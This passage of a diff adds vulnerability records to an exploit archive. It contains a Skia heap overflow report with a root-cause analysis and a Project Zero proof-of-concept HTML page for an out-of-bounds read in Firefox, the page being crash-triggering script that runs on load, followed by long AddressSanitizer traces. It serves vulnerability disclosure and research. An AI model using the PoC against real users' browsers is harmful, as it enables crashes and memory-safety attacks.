+    #0 0x79d6d0 in sk_memset32(unsigned int*, unsigned int, int) /home/ifratric/skia/skia/out/asan/../../src/core/SkUtils.cpp:18:19
+    #1 0x8025f1 in SkLinearGradient::LinearGradientContext::shade4_clamp(int, int, unsigned int*, int) /home/ifratric/skia/skia/out/asan/../../src/effects/gradients/SkLinearGradient.cpp:842:13
+    #2 0x802219 in SkLinearGradient::LinearGradientContext::shadeSpan(int, int, unsigned int*, int) /home/ifratric/skia/skia/out/asan/../../src/effects/gradients/SkLinearGradient.cpp:349:9
+    #3 0xc946f7 in SkARGB32_Shader_Blitter::blitH(int, int, int) /home/ifratric/skia/skia/out/asan/../../src/core/SkBlitter_ARGB32.cpp:384:9
+    #4 0x779484 in walk_convex_edges(SkEdge*, SkPath::FillType, SkBlitter*, int, int, void (*)(SkBlitter*, int, bool)) /home/ifratric/skia/skia/out/asan/../../src/core/SkScan_Path.cpp:295:21
+    #5 0x778107 in sk_fill_path(SkPath const&, SkIRect const&, SkBlitter*, int, int, int, bool) /home/ifratric/skia/skia/out/asan/../../src/core/SkScan_Path.cpp:508:9
+    #6 0x77afe3 in SkScan::FillPath(SkPath const&, SkRegion const&, SkBlitter*) /home/ifratric/skia/skia/out/asan/../../src/core/SkScan_Path.cpp:707:9
+    #7 0x765792 in SkScan::FillPath(SkPath const&, SkRasterClip const&, SkBlitter*) /home/ifratric/skia/skia/out/asan/../../src/core/SkScan_AntiPath.cpp:745:9
+    #8 0x632690 in SkDraw::drawDevPath(SkPath const&, SkPaint const&, bool, SkBlitter*, bool) const /home/ifratric/skia/skia/out/asan/../../src/core/SkDraw.cpp:1072:5
+    #9 0x63321c in SkDraw::drawPath(SkPath const&, SkPaint const&, SkMatrix const*, bool, bool, SkBlitter*) const /home/ifratric/skia/skia/out/asan/../../src/core/SkDraw.cpp:1165:5
+    #10 0xc5c5b3 in SkDraw::drawPath(SkPath const&, SkPaint const&, SkMatrix const*, bool) const /home/ifratric/skia/skia/out/asan/../../src/core/SkDraw.h:54:9
+    #11 0xc5c5b3 in SkBitmapDevice::drawPath(SkDraw const&, SkPath const&, SkPaint const&, SkMatrix const*, bool) /home/ifratric/skia/skia/out/asan/../../src/core/SkBitmapDevice.cpp:243
+    #12 0x51f6b8 in SkCanvas::onDrawPath(SkPath const&, SkPaint const&) /home/ifratric/skia/skia/out/asan/../../src/core/SkCanvas.cpp:2379:9
+    #13 0x4f805d in main /home/ifratric/skia/skia/out/asan/../../crash.cpp:34:5
+    #14 0x7f64ed80f82f in __libc_start_main /build/glibc-GKVZIf/glibc-2.23/csu/../csu/libc-start.c:291
+    #15 0x426788 in _start (/home/ifratric/skia/skia/out/asan/crash+0x426788)
+
+0x62100001dea0 is located 0 bytes to the right of 4512-byte region [0x62100001cd00,0x62100001dea0)
+allocated by thread T0 here:
+    #0 0x4c6728 in __interceptor_malloc (/home/ifratric/skia/skia/out/asan/crash+0x4c6728)
+    #1 0x7e3d38 in sk_malloc_flags(unsigned long, unsigned int) /home/ifratric/skia/skia/out/asan/../../src/ports/SkMemory_malloc.cpp:72:15
+    #2 0x7e3d38 in sk_malloc_throw(unsigned long) /home/ifratric/skia/skia/out/asan/../../src/ports/SkMemory_malloc.cpp:58
+    #3 0xc8598d in SkARGB32_Shader_Blitter* SkArenaAlloc::make<SkARGB32_Shader_Blitter, SkPixmap const&, SkPaint const&, SkShader::Context*&>(SkPixmap const&, SkPaint const&, SkShader::Context*&) /home/ifratric/skia/skia/out/asan/../../src/core/SkArenaAlloc.h:94:30
+    #4 0xc8598d in SkBlitter::Choose(SkPixmap const&, SkMatrix const&, SkPaint const&, SkArenaAlloc*, bool) /home/ifratric/skia/skia/out/asan/../../src/core/SkBlitter.cpp:919
+    #5 0x632542 in SkAutoBlitterChoose::choose(SkPixmap const&, SkMatrix const&, SkPaint const&, bool) /home/ifratric/skia/skia/out/asan/../../src/core/SkDraw.cpp:69:20
+    #6 0x632542 in SkDraw::drawDevPath(SkPath const&, SkPaint const&, bool, SkBlitter*, bool) const /home/ifratric/skia/skia/out/asan/../../src/core/SkDraw.cpp:1018
+    #7 0x63321c in SkDraw::drawPath(SkPath const&, SkPaint const&, SkMatrix const*, bool, bool, SkBlitter*) const /home/ifratric/skia/skia/out/asan/../../src/core/SkDraw.cpp:1165:5
+    #8 0xc5c5b3 in SkDraw::drawPath(SkPath const&, SkPaint const&, SkMatrix const*, bool) const /home/ifratric/skia/skia/out/asan/../../src/core/SkDraw.h:54:9
+    #9 0xc5c5b3 in SkBitmapDevice::drawPath(SkDraw const&, SkPath const&, SkPaint const&, SkMatrix const*, bool) /home/ifratric/skia/skia/out/asan/../../src/core/SkBitmapDevice.cpp:243
+    #10 0x4f805d in main /home/ifratric/skia/skia/out/asan/../../crash.cpp:34:5
+    #11 0x7f64ed80f82f in __libc_start_main /build/glibc-GKVZIf/glibc-2.23/csu/../csu/libc-start.c:291
+
+SUMMARY: AddressSanitizer: heap-buffer-overflow /home/ifratric/skia/skia/out/asan/../../src/core/SkUtils.cpp:18:19 in sk_memset32(unsigned int*, unsigned int, int)
+Shadow bytes around the buggy address:
+  0x0c427fffbb80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x0c427fffbb90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x0c427fffbba0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x0c427fffbbb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x0c427fffbbc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+=>0x0c427fffbbd0: 00 00 00 00[fa]fa fa fa fa fa fa fa fa fa fa fa
+  0x0c427fffbbe0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x0c427fffbbf0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x0c427fffbc00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x0c427fffbc10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x0c427fffbc20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+Shadow byte legend (one shadow byte represents 8 application bytes):
+  Addressable:           00
+  Partially addressable: 01 02 03 04 05 06 07 
+  Heap left redzone:       fa
+  Heap right redzone:      fb
+  Freed heap region:       fd
+  Stack left redzone:      f1
+  Stack mid redzone:       f2
+  Stack right redzone:     f3
+  Stack partial redzone:   f4
+  Stack after return:      f5
+  Stack use after scope:   f8
+  Global redzone:          f9
+  Global init order:       f6
+  Poisoned by user:        f7
+  Container overflow:      fc
+  Array cookie:            ac
+  Intra object redzone:    bb
+  ASan internal:           fe
+  Left alloca redzone:     ca
+  Right alloca redzone:    cb
+==46341==ABORTING
+
+Further analysis:
+
+There is a problem in SkEdge::setLine, in particular the line with x0:-0.499900, y0:100.500000, x1:1128.000000, y1:0.500000
+After conversion to SkFDot6, the coordinates are going to become x0:72192, y0:32, x1:-32, y1:6432
+(notice how x0 got rounded to 32 == -0.5 but I don't think this is the only problem as it gets even smaller below)
+Next the line parameters are computed as follows: fFirstY:1, fLastY:100, fX:73184256, fDX:-739573
+And if you calculate fX + (fLastY-fFirstY) * fDX, you get -33471 (~ -0.51) which will get rounded to -1 in walk_convex_edges and cause an overflow.
+*/
\ No newline at end of file
diff --git a/platforms/multiple/dos/42071.html b/platforms/multiple/dos/42071.html
new file mode 100755
index 000000000..99f486dc5
--- /dev/null
+++ b/platforms/multiple/dos/42071.html
@@ -0,0 +1,207 @@
+<!--
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1160
+
+Mozilla bug tracker link: https://bugzilla.mozilla.org/show_bug.cgi?id=1343552
+
+There is an out-of-bounds read vulnerability in Firefox. The vulnerability was confirmed on the nightly ASan build. 
+
+PoC:
+
+=================================================================
+-->
+
+<style>
+.class1 { float: left; white-space: pre-line; }
+.class2 { border-bottom-style: solid; font-face: Arial; font-size: 7ex; }
+</style>
+<script>
+function go() {
+  menuitem.appendChild(document.body.firstChild);
+  canvas.toBlob(callback);
+}
+function callback() {
+  var s = menu.style;
+  s.setProperty("flex-direction", "row-reverse");
+  option.scrollBy();
+  document.implementation.createHTMLDocument("foo").adoptNode(progress);
+  s.setProperty("flex-direction", "column");
+  canvas.toBlob(callback);
+}
+</script>
+aaaaaaaaaaaaaaaaaa
+</head>
+<body onload=go()>
+<del class="class1">
+<span class="class2">
+<menu id="menu">
+<menuitem>
+</menu>
+<menuitem id="menuitem">
+<progress id="progress">
+</del>
+<ol dir="rtl">l+0</ol>
+<canvas id="canvas">
+<option id="option">
+
+<!--
+=================================================================
+
+ASan log:
+
+=================================================================
+==104545==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x611000721ecc at pc 0x7fcef25af0e8 bp 0x7ffc23afd1b0 sp 0x7ffc23afd1a8
+READ of size 4 at 0x611000721ecc thread T0
+    #0 0x7fcef25af0e7 in IsSimpleGlyph /home/worker/workspace/build/src/gfx/thebes/gfxFont.h:785:46
+    #1 0x7fcef25af0e7 in GetAdvanceForGlyph /home/worker/workspace/build/src/gfx/thebes/gfxTextRun.h:638
+    #2 0x7fcef25af0e7 in GetAdvanceForGlyphs /home/worker/workspace/build/src/gfx/thebes/gfxTextRun.cpp:334
+    #3 0x7fcef25af0e7 in gfxTextRun::GetAdvanceWidth(gfxTextRun::Range, gfxTextRun::PropertyProvider*, gfxFont::Spacing*) const /home/worker/workspace/build/src/gfx/thebes/gfxTextRun.cpp:1074
+    #4 0x7fcef704ac7c in nsTextFrame::TrimTrailingWhiteSpace(mozilla::gfx::DrawTarget*) /home/worker/workspace/build/src/layout/generic/nsTextFrame.cpp:9654:15
+    #5 0x7fcef6d2a2ef in nsLineLayout::TrimTrailingWhiteSpaceIn(nsLineLayout::PerSpanData*, int*) /home/worker/workspace/build/src/layout/generic/nsLineLayout.cpp:2584:44
+    #6 0x7fcef6d2a1c7 in nsLineLayout::TrimTrailingWhiteSpaceIn(nsLineLayout::PerSpanData*, int*) /home/worker/workspace/build/src/layout/generic/nsLineLayout.cpp:2531:11
+    #7 0x7fcef6d2a1c7 in nsLineLayout::TrimTrailingWhiteSpaceIn(nsLineLayout::PerSpanData*, int*) /home/worker/workspace/build/src/layout/generic/nsLineLayout.cpp:2531:11
+    #8 0x7fcef6d2b293 in nsLineLayout::TrimTrailingWhiteSpace() /home/worker/workspace/build/src/layout/generic/nsLineLayout.cpp:2654:3
+    #9 0x7fcef6dcc03b in nsBlockFrame::PlaceLine(mozilla::BlockReflowInput&, nsLineLayout&, nsLineList_iterator, nsFloatManager::SavedState*, mozilla::LogicalRect&, int&, bool*) /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:4479:3
+    #10 0x7fcef6dcabe3 in nsBlockFrame::DoReflowInlineFrames(mozilla::BlockReflowInput&, nsLineLayout&, nsLineList_iterator, nsFlowAreaRect&, int&, nsFloatManager::SavedState*, bool*, LineReflowStatus*, bool) /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:4082:12
+    #11 0x7fcef6dc0d6c in nsBlockFrame::ReflowInlineFrames(mozilla::BlockReflowInput&, nsLineList_iterator, bool*) /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:3828:9
+    #12 0x7fcef6dafacf in ReflowLine /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:2834:5
+    #13 0x7fcef6dafacf in nsBlockFrame::ReflowDirtyLines(mozilla::BlockReflowInput&) /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:2370
+    #14 0x7fcef6da5c1a in nsBlockFrame::Reflow(nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, nsReflowStatus&) /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:1237:3
+    #15 0x7fcef6dc6e8d in nsBlockReflowContext::ReflowBlock(mozilla::LogicalRect const&, bool, nsCollapsingMargin&, int, bool, nsLineBox*, mozilla::ReflowInput&, nsReflowStatus&, mozilla::BlockReflowInput&) /home/worker/workspace/build/src/layout/generic/nsBlockReflowContext.cpp:306:3
+    #16 0x7fcef6dd9001 in nsBlockFrame::ReflowFloat(mozilla::BlockReflowInput&, mozilla::LogicalRect const&, nsIFrame*, mozilla::LogicalMargin&, mozilla::LogicalMargin&, bool, nsReflowStatus&) /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:6272:5
+    #17 0x7fcef6d4d19f in mozilla::BlockReflowInput::FlowAndPlaceFloat(nsIFrame*) /home/worker/workspace/build/src/layout/generic/BlockReflowInput.cpp:910:5
+    #18 0x7fcef6d4b143 in mozilla::BlockReflowInput::AddFloat(nsLineLayout*, nsIFrame*, int) /home/worker/workspace/build/src/layout/generic/BlockReflowInput.cpp:627:14
+    #19 0x7fcef6d21369 in AddFloat /home/worker/workspace/build/src/layout/generic/nsLineLayout.h:190:12
+    #20 0x7fcef6d21369 in nsLineLayout::ReflowFrame(nsIFrame*, nsReflowStatus&, mozilla::ReflowOutput*, bool&) /home/worker/workspace/build/src/layout/generic/nsLineLayout.cpp:979
+    #21 0x7fcef6dcb7bb in nsBlockFrame::ReflowInlineFrame(mozilla::BlockReflowInput&, nsLineLayout&, nsLineList_iterator, nsIFrame*, LineReflowStatus*) /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:4153:3
+    #22 0x7fcef6dca446 in nsBlockFrame::DoReflowInlineFrames(mozilla::BlockReflowInput&, nsLineLayout&, nsLineList_iterator, nsFlowAreaRect&, int&, nsFloatManager::SavedState*, bool*, LineReflowStatus*, bool) /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:3954:5
+    #23 0x7fcef6dc0d6c in nsBlockFrame::ReflowInlineFrames(mozilla::BlockReflowInput&, nsLineList_iterator, bool*) /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:3828:9
+    #24 0x7fcef6dafacf in ReflowLine /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:2834:5
+    #25 0x7fcef6dafacf in nsBlockFrame::ReflowDirtyLines(mozilla::BlockReflowInput&) /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:2370
+    #26 0x7fcef6da5c1a in nsBlockFrame::Reflow(nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, nsReflowStatus&) /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:1237:3
+    #27 0x7fcef6dc6e8d in nsBlockReflowContext::ReflowBlock(mozilla::LogicalRect const&, bool, nsCollapsingMargin&, int, bool, nsLineBox*, mozilla::ReflowInput&, nsReflowStatus&, mozilla::BlockReflowInput&) /home/worker/workspace/build/src/layout/generic/nsBlockReflowContext.cpp:306:3
+    #28 0x7fcef6dbc4da in nsBlockFrame::ReflowBlockFrame(mozilla::BlockReflowInput&, nsLineList_iterator, bool*) /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:3462:7
+    #29 0x7fcef6dafafa in ReflowLine /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:2831:5
+    #30 0x7fcef6dafafa in nsBlockFrame::ReflowDirtyLines(mozilla::BlockReflowInput&) /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:2370
+    #31 0x7fcef6da5c1a in nsBlockFrame::Reflow(nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, nsReflowStatus&) /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:1237:3
+    #32 0x7fcef6e0ada0 in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, mozilla::WritingMode const&, mozilla::LogicalPoint const&, nsSize const&, unsigned int, nsReflowStatus&, nsOverflowContinuationTracker*) /home/worker/workspace/build/src/layout/generic/nsContainerFrame.cpp:1028:3
+    #33 0x7fcef6e09555 in nsCanvasFrame::Reflow(nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, nsReflowStatus&) /home/worker/workspace/build/src/layout/generic/nsCanvasFrame.cpp:711:5
+    #34 0x7fcef6e0ada0 in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, mozilla::WritingMode const&, mozilla::LogicalPoint const&, nsSize const&, unsigned int, nsReflowStatus&, nsOverflowContinuationTracker*) /home/worker/workspace/build/src/layout/generic/nsContainerFrame.cpp:1028:3
+    #35 0x7fcef6eb0394 in nsHTMLScrollFrame::ReflowScrolledFrame(mozilla::ScrollReflowInput*, bool, bool, mozilla::ReflowOutput*, bool) /home/worker/workspace/build/src/layout/generic/nsGfxScrollFrame.cpp:552:3
+    #36 0x7fcef6eb1840 in nsHTMLScrollFrame::ReflowContents(mozilla::ScrollReflowInput*, mozilla::ReflowOutput const&) /home/worker/workspace/build/src/layout/generic/nsGfxScrollFrame.cpp:664:3
+    #37 0x7fcef6eb5073 in nsHTMLScrollFrame::Reflow(nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, nsReflowStatus&) /home/worker/workspace/build/src/layout/generic/nsGfxScrollFrame.cpp:1039:3
+    #38 0x7fcef6e1b964 in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, int, int, unsigned int, nsReflowStatus&, nsOverflowContinuationTracker*) /home/worker/workspace/build/src/layout/generic/nsContainerFrame.cpp:1072:3
+    #39 0x7fcef6d8b760 in mozilla::ViewportFrame::Reflow(nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, nsReflowStatus&) /home/worker/workspace/build/src/layout/generic/ViewportFrame.cpp:326:7
+    #40 0x7fcef6b89187 in mozilla::PresShell::DoReflow(nsIFrame*, bool) /home/worker/workspace/build/src/layout/base/PresShell.cpp:9202:3
+    #41 0x7fcef6b9cde4 in mozilla::PresShell::ProcessReflowCommands(bool) /home/worker/workspace/build/src/layout/base/PresShell.cpp:9375:24
+    #42 0x7fcef6b9bcf6 in mozilla::PresShell::DoFlushPendingNotifications(mozilla::ChangesToFlush) /home/worker/workspace/build/src/layout/base/PresShell.cpp:4174:11
+    #43 0x7fcef2c4646e in FlushPendingNotifications /home/worker/workspace/build/src/obj-firefox/dist/include/nsIPresShell.h:598:5
+    #44 0x7fcef2c4646e in nsDocument::FlushPendingNotifications(mozilla::FlushType) /home/worker/workspace/build/src/dom/base/nsDocument.cpp:7961
+    #45 0x7fcef2a1f2b4 in GetPrimaryFrame /home/worker/workspace/build/src/dom/base/Element.cpp:2164:5
+    #46 0x7fcef2a1f2b4 in mozilla::dom::Element::GetScrollFrame(nsIFrame**, bool) /home/worker/workspace/build/src/dom/base/Element.cpp:637
+    #47 0x7fcef2a20871 in mozilla::dom::Element::ScrollBy(mozilla::dom::ScrollToOptions const&) /home/worker/workspace/build/src/dom/base/Element.cpp:794:28
+    #48 0x7fcef4112002 in mozilla::dom::ElementBinding::scrollBy(JSContext*, JS::Handle<JSObject*>, mozilla::dom::Element*, JSJitMethodCallArgs const&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/ElementBinding.cpp:2492:7
+    #49 0x7fcef45cdd27 in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:2953:13
+    #50 0x7fcefa0cc04f in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:282:15
+    #51 0x7fcefa0cc04f in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:448
+    #52 0x7fcefa0b2970 in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:499:12
+    #53 0x7fcefa0b2970 in Interpret(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2955
+    #54 0x7fcefa097c9b in js::RunScript(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:394:12
+    #55 0x7fcefa0cc366 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:466:15
+    #56 0x7fcefa0cca42 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:512:10
+    #57 0x7fcefaa9cd1c in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/jsapi.cpp:2878:12
+    #58 0x7fcef4242c05 in mozilla::dom::BlobCallback::Call(JSContext*, JS::Handle<JS::Value>, mozilla::dom::Blob*, mozilla::ErrorResult&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/HTMLCanvasElementBinding.cpp:81:8
+    #59 0x7fcef475613f in Call /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/HTMLCanvasElementBinding.h:180:12
+    #60 0x7fcef475613f in mozilla::dom::CanvasRenderingContextHelper::ToBlob(JSContext*, nsIGlobalObject*, mozilla::dom::BlobCallback&, nsAString_internal const&, JS::Handle<JS::Value>, mozilla::ErrorResult&)::EncodeCallback::ReceiveBlob(already_AddRefed<mozilla::dom::Blob>) /home/worker/workspace/build/src/dom/canvas/CanvasRenderingContextHelper.cpp:56
+    #61 0x7fcef2acde86 in mozilla::dom::EncodingCompleteEvent::Run() /home/worker/workspace/build/src/dom/base/ImageEncoder.cpp:105:12
+    #62 0x7fcef0217012 in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1264:7
+    #63 0x7fcef02138c0 in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:389:10
+    #64 0x7fcef10322bf in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/worker/workspace/build/src/ipc/glue/MessagePump.cpp:96:21
+    #65 0x7fcef0fa3658 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:238:3
+    #66 0x7fcef0fa3658 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:231
+    #67 0x7fcef0fa3658 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:211
+    #68 0x7fcef63ffdbf in nsBaseAppShell::Run() /home/worker/workspace/build/src/widget/nsBaseAppShell.cpp:156:3
+    #69 0x7fcef9a88d81 in nsAppStartup::Run() /home/worker/workspace/build/src/toolkit/components/startup/nsAppStartup.cpp:283:19
+    #70 0x7fcef9c5243c in XREMain::XRE_mainRun() /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4476:10
+    #71 0x7fcef9c53f38 in XREMain::XRE_main(int, char**, mozilla::BootstrapConfig const&) /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4654:8
+    #72 0x7fcef9c551fc in XRE_main(int, char**, mozilla::BootstrapConfig const&) /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4745:16
+    #73 0x4dffaf in do_main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:237:10
+    #74 0x4dffaf in main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:308
+    #75 0x7fcf0b63282f in __libc_start_main /build/glibc-t3gR2i/glibc-2.23/csu/../csu/libc-start.c:291
+    #76 0x41c3d8 in _start (/home/ifratric/p0/latest/firefox/firefox+0x41c3d8)
+
+0x611000721ecc is located 0 bytes to the right of 204-byte region [0x611000721e00,0x611000721ecc)
+allocated by thread T0 here:
+    #0 0x4b2e4b in malloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:52:3
+    #1 0x7fcef25b9900 in AllocateStorageForTextRun /home/worker/workspace/build/src/gfx/thebes/gfxTextRun.cpp:122:21
+    #2 0x7fcef25b9900 in Create /home/worker/workspace/build/src/gfx/thebes/gfxTextRun.cpp:139
+    #3 0x7fcef25b9900 in gfxFontGroup::MakeTextRun(unsigned char const*, unsigned int, gfxTextRunFactory::Parameters const*, unsigned int, gfxMissingFontRecorder*) /home/worker/workspace/build/src/gfx/thebes/gfxTextRun.cpp:2075
+    #4 0x7fcef6ff6f49 in BuildTextRunsScanner::BuildTextRunForFrames(void*) /home/worker/workspace/build/src/layout/generic/nsTextFrame.cpp:2394:17
+    #5 0x7fcef6fefe0b in BuildTextRunsScanner::FlushFrames(bool, bool) /home/worker/workspace/build/src/layout/generic/nsTextFrame.cpp:1633:17
+    #6 0x7fcef6ffb09d in BuildTextRunsScanner::ScanFrame(nsIFrame*) /home/worker/workspace/build/src/layout/generic/nsTextFrame.cpp:1902:9
+    #7 0x7fcef6ffb72f in BuildTextRunsScanner::ScanFrame(nsIFrame*) /home/worker/workspace/build/src/layout/generic/nsTextFrame.cpp:1942:5
+    #8 0x7fcef6ffb72f in BuildTextRunsScanner::ScanFrame(nsIFrame*) /home/worker/workspace/build/src/layout/generic/nsTextFrame.cpp:1942:5
+    #9 0x7fcef7003a8a in BuildTextRuns /home/worker/workspace/build/src/layout/generic/nsTextFrame.cpp:1534:7
+    #10 0x7fcef7003a8a in nsTextFrame::EnsureTextRun(nsTextFrame::TextRunType, mozilla::gfx::DrawTarget*, nsIFrame*, nsLineList_iterator const*, unsigned int*) /home/worker/workspace/build/src/layout/generic/nsTextFrame.cpp:2860
+    #11 0x7fcef703d429 in nsTextFrame::AddInlineMinISizeForFlow(nsRenderingContext*, nsIFrame::InlineMinISizeData*, nsTextFrame::TextRunType) /home/worker/workspace/build/src/layout/generic/nsTextFrame.cpp:8329:5
+    #12 0x7fcef70405ef in nsTextFrame::AddInlineMinISize(nsRenderingContext*, nsIFrame::InlineMinISizeData*) /home/worker/workspace/build/src/layout/generic/nsTextFrame.cpp:8499:7
+    #13 0x7fcef6e1a982 in nsContainerFrame::DoInlineIntrinsicISize(nsRenderingContext*, nsIFrame::InlineIntrinsicISizeData*, nsLayoutUtils::IntrinsicISizeType) /home/worker/workspace/build/src/layout/generic/nsContainerFrame.cpp:897:9
+    #14 0x7fcef6e1a982 in nsContainerFrame::DoInlineIntrinsicISize(nsRenderingContext*, nsIFrame::InlineIntrinsicISizeData*, nsLayoutUtils::IntrinsicISizeType) /home/worker/workspace/build/src/layout/generic/nsContainerFrame.cpp:897:9
+    #15 0x7fcef6d9f622 in nsBlockFrame::GetMinISize(nsRenderingContext*) /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:774:11
+    #16 0x7fcef6e1b150 in ShrinkWidthToFit /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:5566:22
+    #17 0x7fcef6e1b150 in nsContainerFrame::ComputeAutoSize(nsRenderingContext*, mozilla::WritingMode, mozilla::LogicalSize const&, int, mozilla::LogicalSize const&, mozilla::LogicalSize const&, mozilla::LogicalSize const&, nsIFrame::ComputeSizeFlags) /home/worker/workspace/build/src/layout/generic/nsContainerFrame.cpp:942
+    #18 0x7fcef6e2260e in nsFrame::ComputeSize(nsRenderingContext*, mozilla::WritingMode, mozilla::LogicalSize const&, int, mozilla::LogicalSize const&, mozilla::LogicalSize const&, mozilla::LogicalSize const&, nsIFrame::ComputeSizeFlags) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:4822:24
+    #19 0x7fcef6d4fb36 in FloatMarginISize(mozilla::ReflowInput const&, int, nsIFrame*, mozilla::SizeComputationInput const&) /home/worker/workspace/build/src/layout/generic/BlockReflowInput.cpp:692:5
+    #20 0x7fcef6d4c21f in mozilla::BlockReflowInput::FlowAndPlaceFloat(nsIFrame*) /home/worker/workspace/build/src/layout/generic/BlockReflowInput.cpp:757:30
+    #21 0x7fcef6d4b143 in mozilla::BlockReflowInput::AddFloat(nsLineLayout*, nsIFrame*, int) /home/worker/workspace/build/src/layout/generic/BlockReflowInput.cpp:627:14
+    #22 0x7fcef6d21369 in AddFloat /home/worker/workspace/build/src/layout/generic/nsLineLayout.h:190:12
+    #23 0x7fcef6d21369 in nsLineLayout::ReflowFrame(nsIFrame*, nsReflowStatus&, mozilla::ReflowOutput*, bool&) /home/worker/workspace/build/src/layout/generic/nsLineLayout.cpp:979
+    #24 0x7fcef6dcb7bb in nsBlockFrame::ReflowInlineFrame(mozilla::BlockReflowInput&, nsLineLayout&, nsLineList_iterator, nsIFrame*, LineReflowStatus*) /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:4153:3
+    #25 0x7fcef6dca446 in nsBlockFrame::DoReflowInlineFrames(mozilla::BlockReflowInput&, nsLineLayout&, nsLineList_iterator, nsFlowAreaRect&, int&, nsFloatManager::SavedState*, bool*, LineReflowStatus*, bool) /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:3954:5
+    #26 0x7fcef6dc0d6c in nsBlockFrame::ReflowInlineFrames(mozilla::BlockReflowInput&, nsLineList_iterator, bool*) /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:3828:9
+    #27 0x7fcef6dafacf in ReflowLine /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:2834:5
+    #28 0x7fcef6dafacf in nsBlockFrame::ReflowDirtyLines(mozilla::BlockReflowInput&) /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:2370
+    #29 0x7fcef6da5c1a in nsBlockFrame::Reflow(nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, nsReflowStatus&) /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:1237:3
